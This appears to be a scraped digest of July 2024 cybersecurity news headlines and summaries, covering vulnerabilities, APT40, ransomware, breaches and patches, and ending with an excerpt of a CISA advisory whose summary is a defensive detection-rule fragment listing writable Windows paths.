          2024-07-10 https://thehackernews.com/2024/07/new-openssh-vulnerability-discovered.html
          Select versions of the OpenSSH secure networking suite are susceptible to a new vulnerability that can trigger remote code execution (RCE). The vulnerability, tracked as CVE-2024-6409 (CVSS score: 7.0), is distinct from CVE-2024-6387 (aka RegreSSHion) and relates to a case of code execution in the privsep child process due to a race condition in signal handling. It only impacts versions 8.7p1 "

          Autosummary: "


          Understanding IoT security risks and how to mitigate them | Cybersecurity podcast

          industry ciber
          2024-07-10 https://www.welivesecurity.com/en/videos/understanding-iot-security-risks-mitigate-cybersecurity-podcast/
          As security challenges loom large on the IoT landscape, how can we effectively counter the risks of integrating our physical and digital worlds? "

          Autosummary: "


          Microsoft’s cybersecurity dilemma: An open letter to Satya Nadella

          ciber
          2024-07-09 https://www.helpnetsecurity.com/2024/07/09/microsoft-cybersecurity-dilemma/

          Microsoft is suffering cybersecurity failures due to systemic problems with strategic leadership. The world is witnessing an alarming trend of cybersecurity issues with Microsoft products and services. Over the past several years, Microsoft has suffered several serious attacks with cloud and email environments being compromised. In some cases, customers were kept in the dark, giving attackers additional time to exploit victims and entrench themselves deeper to the detriment of those affected. Microsoft ignored foundational aspects … More

          The post Microsoft’s cybersecurity dilemma: An open letter to Satya Nadella appeared first on Help Net Security.

          "

          Autosummary: 4. Establish a formal process that includes external industry experts and advisors for additional review, insights, and recommendations in early design and architecture phases, version releases, and during events where cybersecurity may impact overall trust by customers. Position the new team to spearhead or contribute with authority in discussions with media, regulators, governments, and partners when articulating the overall security strategy, risk/benefit discussions, and holistic approach for cybersecurity to enhance the trust of customers. Technical cybersecurity architects, engineers, and developers play a key role in making sure a product is coded securely, but they are not inherently adept at understanding how such solutions will create problems across the ecosystem when misused, compromised, or manipulated. A strategic cybersecurity leadership team must be established to work closely with every product and service division to help them avoid cybersecurity pitfalls and innovate, to increase the overall competitive advantage value of security, privacy, safety, and trust in those products. Just weeks after Brad Smith, the Vice Chairman and President of Microsoft, spoke before Congress and offered assurances, came another embarrassment: Microsoft allowed some of its security certificates to expire for its Office products, and its customers received security alerts from anti-malware agents that blocked the activities for the expired certificates. "


          Exploring the root causes of the cybersecurity skills gap

          ciber
          2024-07-09 https://www.helpnetsecurity.com/2024/07/09/koma-gandy-skillsoft-cybersecurity-skills-gap/

          In this Help Net Security interview, Koma Gandy, VP of Leadership and Business at Skillsoft, addresses the critical aspects of the cybersecurity skills gap, the need for diverse talent and continuous upskilling in areas like AI and cloud computing. Gandy advocates training that combines technical expertise with essential power skills to meet evolving industry demands and secure future career opportunities in cybersecurity. What are the primary factors contributing to the cybersecurity skills gap? Are there … More

          The post Exploring the root causes of the cybersecurity skills gap appeared first on Help Net Security.

          "

          Autosummary: As technologies change and new challenges arise, it’s paramount that organizations and talent take a holistic approach to skills, investing in power skills like interpersonal communication, problem solving, executive presence and creative thinking, along with technical skills and knowledge of how bad actors exploit threat vectors to proactively defend the organization against potential threats, and how to communicate incidents and responses in ways that different audiences can understand (e.g. C-suite, Board, etc.). An effective training program should be multi-modal, involving virtual, on-demand courses, as well as interactive, AI-driven, and instructor-led elements. In this Help Net Security interview, Koma Gandy, VP of Leadership and Business at Skillsoft, addresses the critical aspects of the cybersecurity skills gap, the need for diverse talent and continuous upskilling in areas like AI and cloud computing. "


          Cybersecurity Agencies Warn of China-linked APT40’s Rapid Exploit Adaptation

          exploits ciber
          2024-07-09 https://thehackernews.com/2024/07/cybersecurity-agencies-warn-of-china.html
          Cybersecurity agencies from Australia, Canada, Germany, Japan, New Zealand, South Korea, the U.K., and the U.S. have released a joint advisory about a China-linked cyber espionage group called APT40, warning about its ability to co-opt exploits for newly disclosed security flaws within hours or days of public release. "APT 40 has previously targeted organizations in various countries, including "

          Autosummary: " The adversarial collective, also known as Bronze Mohawk, Gingham Typhoon (formerly Gadolinium), ISLANDDREAMS, Kryptonite Panda, Leviathan, Red Ladon, TA423, and TEMP.Periscope, is known to be active since at least 2013, carrying out cyber attacks targeting entities in the Asia-Pacific region. "


          Trojanized jQuery Packages Found on npm, GitHub, and jsDelivr Code Repositories

          exploits
          2024-07-09 https://thehackernews.com/2024/07/trojanized-jquery-packages-found-on-npm.html
          Unknown threat actors have been found propagating trojanized versions of jQuery on npm, GitHub, and jsDelivr in what appears to be an instance of a "complex and persistent" supply chain attack. "This attack stands out due to the high variability across packages," Phylum said in an analysis published last week. "The attacker has cleverly hidden the malware in the seldom-used "end" function of "

          Autosummary: "


          Align strengthens defense against double-extortion ransomware tactics

          exploits ransomware industry
          2024-07-09 https://www.helpnetsecurity.com/2024/07/09/align-exfiltration-prevention-feature/

          Align adds a new exfiltration prevention feature to its Align Guardian Managed Detection and Response offering, powered by Adlumin. This innovation is designed to detect and stop attackers from exfiltrating data, providing a defense against modern ransomware tactics that employ double-extortion techniques. The new ransomware and exfiltration prevention feature complements Guardian’s existing ransomware prevention capabilities, which already stop ransomware encryption fast enough to save 99% of files. This comprehensive approach now protects organizations from both … More

          The post Align strengthens defense against double-extortion ransomware tactics appeared first on Help Net Security.

          "

          Autosummary: "


          GuardZoo Malware Targets Over 450 Middle Eastern Military Personnel

          exploits
          2024-07-09 https://thehackernews.com/2024/07/guardzoo-malware-targets-over-450.html
          Military personnel from Middle East countries are the target of an ongoing surveillanceware operation that delivers an Android data-gathering tool called GuardZoo. The campaign, believed to have commenced as early as October 2019, has been attributed to a Houthi-aligned threat actor based on the application lures, command-and-control (C2) server logs, targeting footprint, and the attack "

          Autosummary: "


          Avast released a decryptor for DoNex Ransomware and its predecessors

          exploits ransomware
          2024-07-09 https://securityaffairs.com/165469/malware/donex-ransomware-decryptor.html
          Avast developed and released a decryptor for the DoNex ransomware family that allows victims to recover their files for free. Avast researchers identified a cryptographic flaw in the DoNex ransomware and its predecessors that allowed them to develop a decryptor. The experts revealed the weakness during the Recon 2024 conference. Avast also released a decryptor […] "

          Autosummary: Avast released a decryptor for DoNex Ransomware and its predecessors Pierluigi Paganini July 09, 2024 Avast developed and released a decryptor for the DoNex ransomware family that allows victims to recover their files for free. "


          Evolve Bank says data breach impacts 7.6 million Americans

          financial
          2024-07-09 https://www.bleepingcomputer.com/news/security/evolve-bank-says-data-breach-impacts-76-million-americans/
          Evolve Bank & Trust (Evolve) is sending notices of a data breach to 7.6 million Americans whose data was stolen during a recent LockBit ransomware attack. [...] "

          Autosummary: Evolve has active partnerships with other entities, including Shopify, Plaid, Stripe, and Mercury, but those companies have not yet disclosed whether the Lockbit ransomware incident impacted them. "


          Ransomware attack on blood-testing service puts lives in danger in South Africa

          exploits
          2024-07-09 https://www.bitdefender.com/blog/hotforsecurity/ransomware-attack-on-blood-testing-service-puts-lives-in-danger-in-south-africa/
          A ransomware attack by the BlackSuit gang against South Africa’s National Health Laboratory Service (NHLS) has put lives at risk and created chaos for healthcare services across the country. Read more in my article on the Hot for Security blog. "

          Autosummary: Someone with a "thick Eastern-European accent" who claimed to be a middle-man for the BlackSuit ransomware gang has called journalists and NHLS staff members demanding a ransom payment and denying that the group had any intention to cause casualties: "The NHLS was given an opportunity to solve this problem and foolishly tried to withdraw the server data. "


          Critical vulnerability in the RADIUS protocol leaves networking equipment open to attack

          exploits
          2024-07-09 https://www.helpnetsecurity.com/2024/07/09/blastradius-radius-protocol-vulnerability/

          A new critical security vulnerability in the RADIUS protocol, dubbed BlastRADIUS, leaves most networking equipment open to Man-in-the-Middle (MitM) attacks. While the vulnerability can be difficult to exploit, the possible impact of an exploit is substantial. What’s at stake? To protect businesses from BlastRADIUS, “every network switch, router, firewall, VPN concentrator, access point, and DSL gateway worldwide needs to be updated to add integrity and authentication checks for these packets,” explains Alan DeKok, CEO of … More

          The post Critical vulnerability in the RADIUS protocol leaves networking equipment open to attack appeared first on Help Net Security.

          "

          Autosummary: To protect businesses from BlastRADIUS, “every network switch, router, firewall, VPN concentrator, access point, and DSL gateway worldwide needs to be updated to add integrity and authentication checks for these packets,” explains Alan DeKok, CEO of InkBridge Networks and one of the foremost experts on RADIUS servers. Authentication methods listed as affected: PAP, CHAP, MS-CHAPv2, and other non-EAP authentication methods. Systems deemed not vulnerable: 802.1x, IPSec, TLS, Eduroam, OpenRoaming. DeKok and his team also maintain the open-source FreeRADIUS project and participate in the IETF standards development. "


          Chinese APT40 group swiftly leverages public PoC exploits

          exploits
          2024-07-09 https://www.helpnetsecurity.com/2024/07/09/apt40-poc-exploits/

          Chinese state-sponsored cyber group APT40 is amazingly fast at adapting public proof-of-concept (PoC) exploits for vulnerabilities in widely used software, an advisory released by intelligence and cybersecurity agencies from eight countries warns. The group, which is also known as Kryptonite Panda and Gingham Typhoon and is believed to be sponsored by China’s Ministry of State Security, is expected to continue with this modus operandi, “using POCs for new high-profile vulnerabilities within hours or days … More

          The post Chinese APT40 group swiftly leverages public PoC exploits appeared first on Help Net Security.

          "

          Autosummary: "


          RADIUS Protocol Vulnerability Exposes Networks to MitM Attacks

          exploits
          2024-07-09 https://thehackernews.com/2024/07/radius-protocol-vulnerability-exposes.html
          Cybersecurity researchers have discovered a security vulnerability in the RADIUS network authentication protocol called BlastRADIUS that could be exploited by an attacker to stage Mallory-in-the-middle (MitM) attacks and bypass integrity checks under certain circumstances. "The RADIUS protocol allows certain Access-Request messages to have no integrity or authentication checks," InkBridge "

          Autosummary: " RADIUS, short for Remote Authentication Dial-In User Service, is a client/server protocol that provides centralized authentication, authorization, and accounting (AAA) management for users who connect and use a network service. "


          Hackers Exploiting Jenkins Script Console for Cryptocurrency Mining Attacks

          exploits
          2024-07-09 https://thehackernews.com/2024/07/hackers-exploiting-jenkins-script.html
          Cybersecurity researchers have found that it’s possible for attackers to weaponize improperly configured Jenkins Script Console instances to further criminal activities such as cryptocurrency mining. "Misconfigurations such as improperly set up authentication mechanisms expose the "/script" endpoint to attackers," Trend Micro’s Shubham Singh and Sunil Bharti said in a technical write-up "

          Autosummary: " While access to Script Console is typically limited only to authenticated users with administrative permissions, misconfigured Jenkins instances could inadvertently make the "/script" (or "/scriptText") endpoint accessible over the internet, making it ripe for exploitation by attackers looking to run dangerous commands. "


          Microsoft July 2024 Patch Tuesday fixes 142 flaws, 4 zero-days

          exploits
          2024-07-09 https://www.bleepingcomputer.com/news/microsoft/microsoft-july-2024-patch-tuesday-fixes-142-flaws-4-zero-days/
          Today is Microsoft’s July 2024 Patch Tuesday, which includes security updates for 142 flaws, including two actively exploited and two publicly disclosed zero-days. [...] "

          Autosummary: The number of bugs in each vulnerability category is listed below: 26 Elevation of Privilege Vulnerabilities, 24 Security Feature Bypass Vulnerabilities, 59 Remote Code Execution Vulnerabilities, 9 Information Disclosure Vulnerabilities, 17 Denial of Service Vulnerabilities, 7 Spoofing Vulnerabilities. To learn more about the non-security updates released today, you can review our dedicated articles on the new Windows 11 KB5040435 update and Windows 10 KB5040427 update. "


          City of Philadelphia says over 35,000 hit in May 2023 breach

          government
          2024-07-09 https://www.bleepingcomputer.com/news/security/city-of-philadelphia-says-over-35-000-hit-in-may-2023-breach/
          The City of Philadelphia revealed that a May 2024 breach disclosed in October impacted more than 35,000 individuals’ personal and protected health information. [...] "

          Autosummary: "


          The AI Fix #6: AI lobotomies, and bots scam scam bots

          financial
          2024-07-09 https://grahamcluley.com/the-ai-fix-6/
          In episode six of The AI Fix, our hosts discover an unusual place to put a traffic cone, Mark learns why Americans should pretend to be from Brazil, and Graham discovers a way to make any situation much, much worse. Graham inflicts his terrible Australian accent on Mark while explaining bot-on-bot crime, and Mark tells … Continue reading "The AI Fix #6: AI lobotomies, and bots scam scam bots" "

          Autosummary: "


          More than 31 million customer email addresses exposed following Neiman Marcus data breach

          financial
          2024-07-09 https://securityaffairs.com/165492/data-breach/neiman-marcus-data-breach-2.html
          The recent data breach suffered by the American luxury department store chain Neiman Marcus has exposed more than 31 million customer email addresses. In May 2024, the American luxury retailer and department store chain Neiman Marcus disclosed a data breach following the security breach of the cloud-based data warehousing company Snowflake. The luxury retailer disclosed […] "

          Autosummary: Tweet by HackManac (@H4ckManac), June 28, 2024: "#DataLeak #USA: Twilio Authy, Truist Bank, Neiman Marcus: Millions of customers’ data allegedly leaked. Twilio Authy – 33 million phone details (data includes account ID, phone number, device lock, account status, device count). Truist Bank – 65k employee IBM…" Major #DataBreach #USA: "


          Brazil’s Bolsonaro may be charged over jewel sale

          latam
          2024-07-09 https://www.bbc.com/news/articles/c3gwdn2j816o
          Brazil’s ex-president is accused of benefiting from a scheme to sell gifts given to his government. "

          Autosummary: The former president’s lawyer, Paulo Cunha, posted on social media that heads of state "have no direct or indirect influence" on what happens to official gifts. "


          US disrupts AI-powered bot farm pushing Russian propaganda on X

          rusia-ucrania
          2024-07-09 https://www.bleepingcomputer.com/news/security/us-disrupts-ai-powered-bot-farm-pushing-russian-propaganda-on-x/
          Almost a thousand Twitter accounts controlled by a large bot farm pushing Russian propaganda and domains used to register the bots were taken down in a joint international law enforcement operation led by the U.S. Justice Department. [...] "

          Autosummary: "


          Fujitsu confirms customer data exposed in March cyberattack

          ciber
          2024-07-09 https://www.bleepingcomputer.com/news/security/fujitsu-confirms-customer-data-exposed-in-march-cyberattack/
          Fujitsu confirms that information related to some individuals and customers’ business has been compromised during the data breach detected earlier this year. [...] "

          Autosummary: "


          Microsoft fixes two zero-days exploited by attackers (CVE-2024-38080, CVE-2024-38112)

          exploits
          2024-07-09 https://www.helpnetsecurity.com/2024/07/09/microsoft-fixes-two-zero-days-exploited-by-attackers-cve-2024-38080-cve-2024-38112/

          For July 2024 Patch Tuesday, Microsoft has released security updates and patches that fix 142 CVEs, including two exploited zero-days (CVE-2024-38080, CVE-2024-38112) in Windows Hyper-V and Windows MSHTML Platform (respectively). Zero-days exploited in the wild (CVE-2024-38080, CVE-2024-38112) CVE-2024-38080 is an integer overflow or wraparound bug affecting Hyper-V, Windows’ native hypervisor for creating virtual machines on systems running Windows and Windows Server. Successful exploitation may allow attackers to gain SYSTEM privileges on the host machine, but … More

          The post Microsoft fixes two zero-days exploited by attackers (CVE-2024-38080, CVE-2024-38112) appeared first on Help Net Security.

          "

          Autosummary: Zero-days exploited in the wild (CVE-2024-38080, CVE-2024-38112) CVE-2024-38080 is an integer overflow or wraparound bug affecting Hyper-V, Windows’ native hypervisor for creating virtual machines on systems running Windows and Windows Server. "


          Evolve Bank data breach impacted over 7.6 million individuals

          financial
          2024-07-09 https://securityaffairs.com/165504/cyber-crime/evolve-bank-data-breach-7-6m-people.html
          The Lockbit ransomware attack on Evolve Bank has compromised the personal information of over 7.6 million individuals. At the end of June, the LockBit gang announced that it had breached the systems of the Federal Reserve of the United States and exfiltrated 33 TB of sensitive data, including “Americans’ banking secrets.” Despite the announcement, data leaked data […] "

          Autosummary: “Evolve Bank & Trust is making retail bank customers and financial technology partners’ customers (end users) aware of a cybersecurity incident that may involve certain personal information, as well as the actions we have taken in response, and additional steps individuals may take.” reads the notice of Cybersecurity Incident. "


          5 common Ticketmaster scams: How fraudsters steal the show

          financial
          2024-07-09 https://www.welivesecurity.com/en/scams/5-common-ticketmaster-scams-fraudsters-steal-show/
          Scammers gonna scam scam scam, so before hunting for your tickets to a Taylor Swift gig or other in-demand events, learn how to stop fraudsters from leaving a blank space in your bank account "

          Autosummary: Scammers gonna scam scam scam, so before hunting for your tickets to a Taylor Swift gig or other in-demand events, learn how to stop fraudsters from leaving a blank space in your bank account. Thanks to advances in technology, buying tickets to your favorite show has probably never been easier – as long as you can sometimes endure virtual queues and you’re not a Swiftie, of course. They’ll pressure you into full payment – likely by bank transfer, Zelle, Venmo, etc. or even gift card. 4. Replicated tickets/duplicate listings: Scammers look for individuals reselling their tickets online, who have posted pics of those tickets. If you can’t resist buying via social media, steer clear of sellers with no details in their bio, few followers, and who tend to only post about ticket sales. "


          How nation-state cyber attacks disrupt public services and undermine citizen trust

          government
          2024-07-08 https://www.helpnetsecurity.com/2024/07/08/rob-greer-broadcom-nation-state-attacks/

          In this Help Net Security interview, Rob Greer, VP and GM of the Enterprise Security Group at Broadcom, discusses the impact of nation-state cyber attacks on public sector services and citizens, as well as the broader implications for trust and infrastructure. Greer also discusses common vulnerabilities in government IT systems and the potential of AI and public-private collaborations to enhance cybersecurity defenses. How do nation-state attacks affect the public sector and services provided to citizens? … More

          The post How nation-state cyber attacks disrupt public services and undermine citizen trust appeared first on Help Net Security.

          "

          Autosummary: In 2017, the WannaCry attack, which spread to 150 countries across the world, disrupted the UK NHS, limiting ambulance service, patient appointments, medical tests and results, and forcing the closure of various facilities. In this Help Net Security interview, Rob Greer, VP and GM of the Enterprise Security Group at Broadcom, discusses the impact of nation-state cyber attacks on public sector services and citizens, as well as the broader implications for trust and infrastructure. "


          Apple Removes VPN Apps from Russian App Store Amid Government Pressure

          government rusia-ucrania
          2024-07-08 https://thehackernews.com/2024/07/apple-removes-vpn-apps-from-russian-app.html
          Apple removed a number of virtual private network (VPN) apps in Russia from its App Store on July 4, 2024, following a request by Russia’s state communications watchdog Roskomnadzor, Russian news media reported. This includes the mobile apps of 25 VPN service providers, including ProtonVPN, Red Shield VPN, NordVPN and Le VPN, according to MediaZona. It’s worth noting that NordVPN previously shut "

          Autosummary: "


          Decryptor for DoNex, Muse, DarkRace, (fake) LockBit 3.0 ransomware released

          exploits ransomware
          2024-07-08 https://www.helpnetsecurity.com/2024/07/08/decryptor-donex-muse-darkrace-fake-lockbit-3-0/

          A cryptographic weakness in the DoNex ransomware and its previous incarnations – Muse, fake LockBit 3.0, and DarkRace – has allowed Avast researchers to create a decryptor for files encrypted by all those ransomware variants. DoNex ransom note (Source: Avast) “In cooperation with law enforcement organizations, we have been silently providing the decryptor to DoNex ransomware victims since March 2024,” the company’s Threat Research Team has shared on Monday. About DoNex The DoNex ransomware actor … More

          The post Decryptor for DoNex, Muse, DarkRace, (fake) LockBit 3.0 ransomware released appeared first on Help Net Security.

          "

          Autosummary: After downloading the decryptor, victims need to provide a list of drives, folders, and files that need to be decrypted, as well as an encrypted file and the same file in its original form. "


          Experts Warn of Mekotio Banking Trojan Targeting Latin American Countries

          financial exploits
          2024-07-08 https://thehackernews.com/2024/07/experts-warn-of-mekotio-banking-trojan.html
          Financial institutions in Latin America are being threatened by a banking trojan called Mekotio (aka Melcoz). That’s according to findings from Trend Micro, which said it recently observed a surge in cyber attacks distributing the Windows malware. Mekotio, known to be actively put to use since 2015, is known to target Latin American countries like Brazil, Chile, Mexico, Spain, Peru, and Portugal "

          Autosummary: Mekotio, known to be actively put to use since 2015, is known to target Latin American countries like Brazil, Chile, Mexico, Spain, Peru, and Portugal with an aim to steal banking credentials. "


          CISA adds Cisco NX-OS Command Injection bug to its Known Exploited Vulnerabilities catalog

          exploits
          2024-07-08 https://securityaffairs.com/165415/security/cisa-adds-cisco-nx-os-command-injection-bug-known-exploited-vulnerabilities-catalog.html
          U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Cisco NX-OS Command Injection bug to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Cisco NX-OS Command Injection Vulnerability, tracked as CVE-2024-20399, to its Known Exploited Vulnerabilities (KEV) catalog. This week, Cisco addressed an NX-OS zero-day, tracked as CVE-2024-20399 (CVSS score […] "

          Autosummary: The vulnerability impacts the following devices: MDS 9000 Series Multilayer Switches (CSCwj97007); Nexus 3000 Series Switches (CSCwj97009); Nexus 5500 Platform Switches (CSCwj97011); Nexus 5600 Platform Switches (CSCwj97011); Nexus 6000 Series Switches (CSCwj97011); Nexus 7000 Series Switches (CSCwj94682)*; Nexus 9000 Series Switches in standalone NX-OS mode (CSCwj97009). Cisco recommends customers monitor the use of credentials for the administrative users network-admin and vdc-admin. "


          Roblox vendor data breach exposes dev conference attendee info

          financial
          2024-07-08 https://www.bleepingcomputer.com/news/security/roblox-vendor-data-breach-exposes-dev-conference-attendee-info/
          Roblox announced late last week that it suffered a data breach impacting attendees of the 2022, 2023, and 2024 Roblox Developer Conference. [...] "

          Autosummary: "


          New Ransomware-as-a-Service ‘Eldorado’ Targets Windows and Linux Systems

          exploits ransomware Linux
          2024-07-08 https://thehackernews.com/2024/07/new-ransomware-as-service-eldorado.html
          An emerging ransomware-as-a-service (RaaS) operation called Eldorado comes with locker variants to encrypt files on Windows and Linux systems. Eldorado first appeared on March 16, 2024, when an advertisement for the affiliate program was posted on the ransomware forum RAMP, Singapore-headquartered Group-IB said. The cybersecurity firm, which infiltrated the ransomware group, noted that its "

          Autosummary: Eldorado is the latest in the list of new double-extortion ransomware players that have sprung up in recent times, including Arcus Media, AzzaSec, dan0n, Limpopo (aka SOCOTRA, FORMOSA, SEXi), LukaLocker, Shinra, and Space Bears once again highlighting the enduring and persistent nature of the threat. "


          5 Key Questions CISOs Must Ask Themselves About Their Cybersecurity Strategy

          ciber
          2024-07-08 https://thehackernews.com/2024/07/5-key-questions-cisos-must-ask.html
          Events like the recent massive CDK ransomware attack – which shuttered car dealerships across the U.S. in late June 2024 – barely raise public eyebrows anymore. Yet businesses, and the people that lead them, are justifiably jittery. Every CISO knows that cybersecurity is an increasingly hot topic for executives and board members alike. And when the inevitable CISO/Board briefing rolls "

          Autosummary: The Questions: As a CISO, asking yourself these five key questions can help you bridge the board/executive communication gap, present a clear picture of cybersecurity posture, and gain the support needed to effectively manage risk: 1. The Numbers Speak: Despite this clear and pressing need for communication, recent research by Heidrick and Struggles, leading executive search, and corporate culture consulting services, revealed a worrying disconnect between CISOs and CEOs. Recognizing your team’s successes boosts organizational morale, fosters a culture of security awareness, and highlights the value of cybersecurity investments. A company board deserves clear, concise information tied to business goals, not technical details about fixes or attack methods. "


          Avast releases free decryptor for DoNex ransomware and past variants

          exploits ransomware
          2024-07-08 https://www.bleepingcomputer.com/news/security/avast-releases-free-decryptor-for-donex-ransomware-and-past-variants/
          Antivirus company Avast has discovered a weakness in the cryptographic scheme of the DoNex ransomware family and released a decryptor so victims can recover their files for free. [...] "

          Autosummary: Location of recent DoNex ransomware victims (Source: Avast). Weakness in cryptography: During the DoNex ransomware’s execution, an encryption key is generated using the "CryptGenRandom()" function, initializing a ChaCha20 symmetric key used to encrypt the target’s files. "


          RCE bug in widely used Ghostscript library now exploited in attacks

          exploits
          2024-07-08 https://www.bleepingcomputer.com/news/security/rce-bug-in-widely-used-ghostscript-library-now-exploited-in-attacks/
          A remote code execution vulnerability in the Ghostscript document conversion toolkit, widely used on Linux systems, is currently being exploited in attacks. [...] "

          Autosummary: Ghostscript comes pre-installed on many Linux distributions and is used by various document conversion software, including ImageMagick, LibreOffice, GIMP, Inkscape, Scribus, and the CUPS printing system. "


          CloudSorcerer hackers abuse cloud services to steal Russian govt data

          rusia-ucrania
          2024-07-08 https://www.bleepingcomputer.com/news/security/cloudsorcerer-hackers-abuse-cloud-services-to-steal-russian-govt-data/
          A new advanced persistent threat (APT) group named CloudSorcerer abuses public cloud services to steal data from Russian government organizations in cyberespionage attacks. [...] "

          Autosummary: It also supports a range of commands retrieved from the C2, including: shell command execution using the "ShellExecuteExW" API; copy, move, rename, or delete files; receive a shellcode from the pipe and inject it into any process by allocating memory and creating a new thread in a remote process; receive a PE file, create a section, and map it into the remote process; create a process using COM interfaces; create a process as a dedicated user; create a new service or modify an existing service; add new network users or remove legitimate users from the system. Overall, the CloudSorcerer backdoor is a potent tool that enables the threat actors to perform malicious actions on the infected machines. "


          New APT Group "CloudSorcerer" Targets Russian Government Entities

          government rusia-ucrania
          2024-07-08 https://thehackernews.com/2024/07/new-apt-group-cloudsorcerer-targets.html
          A previously undocumented advanced persistent threat (APT) group dubbed CloudSorcerer has been observed targeting Russian government entities by leveraging cloud services for command-and-control (C2) and data exfiltration. Cybersecurity firm Kaspersky, which discovered the activity in May 2024, said the tradecraft adopted by the threat actor bears similarities with that of CloudWizard, but pointed "

          Autosummary: "


          Dark Web Malware Logs Expose 3,300 Users Linked to Child Abuse Sites

          exploits
          2024-07-08 https://thehackernews.com/2024/07/dark-web-malware-logs-expose-3300-users.html
          An analysis of information-stealing malware logs published on the dark web has led to the discovery of thousands of consumers of child sexual abuse material (CSAM), indicating how such information could be used to combat serious crimes. "Approximately 3,300 unique users were found with accounts on known CSAM sources," Recorded Future said in a proof-of-concept (PoC) report published last week. "

          Autosummary: "


          Critical Ghostscript flaw exploited in the wild. Patch it now!

          exploits
          2024-07-08 https://securityaffairs.com/165449/hacking/ghostscript-vulnerability-cve-2024-29510.html
          Threat actors are exploiting Ghostscript vulnerability CVE-2024-29510 to bypass the sandbox and achieve remote code execution. Threat actors are actively exploiting a Ghostscript vulnerability, tracked as CVE-2024-29510, that can allow them to escape the -dSAFER sandbox and achieve remote code execution. Ghostscript is an interpreter for the PostScript language and for PDF files. It is […] "

          Autosummary: Researchers at Codean Labs discovered six vulnerabilities (CVE-2024-29510, CVE-2024-29509, CVE-2024-29506, CVE-2024-29507, CVE-2024-29508, CVE-2024-29511) that were addressed with versions 10.03.0 and 10.03.1. “If your distribution does not provide the latest Ghostscript version, it might still have released a patch version containing a fix for this vulnerability (e.g., Debian, Ubuntu, Fedora).” wrote the experts. "


          Neiman Marcus data breach: 31 million email addresses found exposed

          financial
          2024-07-08 https://www.bleepingcomputer.com/news/security/neiman-marcus-data-breach-31-million-email-addresses-found-exposed/
          A May 2024 data breach disclosed by American luxury retailer and department store chain Neiman Marcus last month has exposed more than 31 million customer email addresses, according to Have I Been Pwned founder Troy Hunt, who analyzed the stolen data. [...] "

          Autosummary: In a separate incident notification published on its website, Neiman Marcus revealed that the data exposed in the attack included names, contact information (e.g., email and postal addresses, and phone numbers), dates of birth, gift card info, transaction data, partial credit card (without expiration dates or CVVs) and Social Security numbers, and employee identification numbers. "


          People’s Republic of China (PRC) Ministry of State Security APT40 Tradecraft in Action

          government
          2024-07-08 https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-190a

          Overview

          Background

          This advisory, authored by the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), the United States Cybersecurity and Infrastructure Security Agency (CISA), the United States National Security Agency (NSA), the United States Federal Bureau of Investigation (FBI), the United Kingdom National Cyber Security Centre (NCSC-UK), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ), the German Federal Intelligence Service (BND) and Federal Office for the Protection of the Constitution (BfV), the Republic of Korea’s National Intelligence Service (NIS) and NIS’ National Cyber Security Center, and Japan’s National Center of Incident Readiness and Strategy for Cybersecurity (NISC) and National Policy Agency (NPA)—hereafter referred to as the “authoring agencies”—outlines a People’s Republic of China (PRC) state-sponsored cyber group and their current threat to Australian networks. The advisory draws on the authoring agencies’ shared understanding of the threat as well as ASD’s ACSC incident response investigations.

          The PRC state-sponsored cyber group has previously targeted organizations in various countries, including Australia and the United States, and the techniques highlighted below are regularly used by other PRC state-sponsored actors globally. Therefore, the authoring agencies believe the group, and similar techniques, remain a threat to their countries’ networks as well.

          The authoring agencies assess that this group conducts malicious cyber operations for the PRC Ministry of State Security (MSS). The activity and techniques overlap with the groups tracked as Advanced Persistent Threat (APT) 40 (also known as Kryptonite Panda, GINGHAM TYPHOON, Leviathan and Bronze Mohawk in industry reporting). This group has previously been reported as being based in Haikou, Hainan Province, PRC and receiving tasking from the PRC MSS, Hainan State Security Department.[1]

          The following Advisory provides a sample of significant ca "

          Autosummary:
          Detection:
            writable_path:
              Image|contains:
                - ":\\$Recycle.Bin\\"
                - ":\\AMD\\Temp\\"
                - ":\\Intel\\"
                - ":\\PerfLogs\\"
                - ":\\Windows\\addins\\"
                - ":\\Windows\\appcompat\\"
                - ":\\Windows\\apppatch\\"
                - ":\\Windows\\AppReadiness\\"
                - ":\\Windows\\bcastdvr\\"
                - ":\\Windows\\Boot\\"
                - ":\\Windows\\Branding\\"
                - ":\\Windows\\CbsTemp\\"
                - ":\\Windows\\Containers\\"
                - ":\\Windows\\csc\\"
                - ":\\Windows\\Cursors\\"
                - ":\\Windows\\debug\\"
                - ":\\Windows\\diagnostics\\"
                - ":\\Windows\\DigitalLocker\\"
                - ":\\Windows\\dot3svc\\"
                - ":\\Windows\\en-US\\"
                - ":\\Windows\\Fonts\\"
                - ":\\Windows\\Globalization\\"
                - ":\\Windows\\Help\\"
                - ":\\Windows\\IdentityCRL\\"
                - ":\\Windows\\IME\\"
                - ":\\Windows\\ImmersiveControlPanel\\"
                - ":\\Windows\\INF\\"
                - ":\\Windows\\intel\\"
                - ":\\Windows\\L2Schemas\\"
                - ":\\Windows\\LiveKernelReports\\"
                - ":\\Windows\\Logs\\"
                - ":\\Windows\\media\\"
                - ":\\Windows\\Migration\\"
                - ":\\Windows\\ModemLogs\\"
                - ":\\Windows\\ms\\"
                - ":\\Windows\\OCR\\"
                - ":\\Windows\\panther\\"
                - ":\\Windows\\Performance\\"
                - ":\\Windows\\PLA\\"
                - ":\\Windows\\PolicyDefinitions\\"
                - ":\\Windows\\Prefetch\\"
                - ":\\Windows\\PrintDialog\\"
                - ":\\Windows\\Provisioning\\"
                - ":\\Windows\\Registration\\CRMLog\\"
                - ":\\Windows\\RemotePackages\\"
                - ":\\Windows\\rescache\\"
                - ":\\Windows\\Resources\\"
                - ":\\Windows\\SchCache\\"
                - ":\\Windows\\schemas\\"
                - ":\\Windows\\security\\"
                - ":\\Windows\\ServiceState\\"
                - ":\\Windows\\servicing\\"
                - ":\\Windows\\Setup\\"
                - ":\\Windows\\ShellComponents\\"
                - ":\\Windows\\ShellExperiences\\"
                - ":\\Windows\\SKB\\"
                - ":\\Windows\\TAPI\\"
                - ":\\Windows\\Tasks\\"
                - ":\\Windows\\TextInput\\"
                - ":\\Windows\\tracing\\"
                - ":\\Windows\\Vss\\"
                - ":\\Windows\\WaaS\\"
                - ":\\Windows\\Web\\"
                - ":\\Windows\\wlansvc\\"
                - ":\\Windows\\System32\\Com\\dmp\\"
